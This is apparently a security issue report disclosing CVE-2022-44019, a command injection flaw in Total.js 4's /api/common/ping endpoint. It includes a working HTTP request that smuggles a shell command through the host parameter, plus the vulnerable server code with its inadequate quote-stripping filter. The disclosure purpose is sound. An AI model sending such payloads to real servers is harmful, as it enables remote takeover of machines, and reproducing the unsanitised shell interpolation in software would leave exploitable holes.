CVE-2022-44019: [Security] Remote command execution · Issue #12 · totaljs/code
In Total.js 4 before 0e5ace7, /api/common/ping can achieve remote command execution via shell metacharacters in the host parameter.
Using the API /api/common/ping it’s possible to achieve remote command execution on the host machine. This leads to complete control over the machine hosting the server.
POST /api/common/ping HTTP/1.1
Host: 0.0.0.0:8000
User-Agent: bla-bla-bla
Cookie: your-auth-cookie
Content-Length: 15
host=1.1.1.1;id
schema.addWorkflow('ping', function($) {
    // Blacklist only strips quotes and newlines; ';', '|', '&' and '$(...)' pass through
    var host = $.model.host.replace(/'|"|\n/g, '');
    // The user-controlled host is interpolated into a shell command line
    Exec('ping -c 3 {0}'.format(host), $.done(true));
});
The problem here is that the server does not validate the input correctly: it never checks that the supplied host is a legitimate hostname or IP address, and it leaves shell metacharacters such as ;, | or & in place, so they reach the shell that runs the ping command.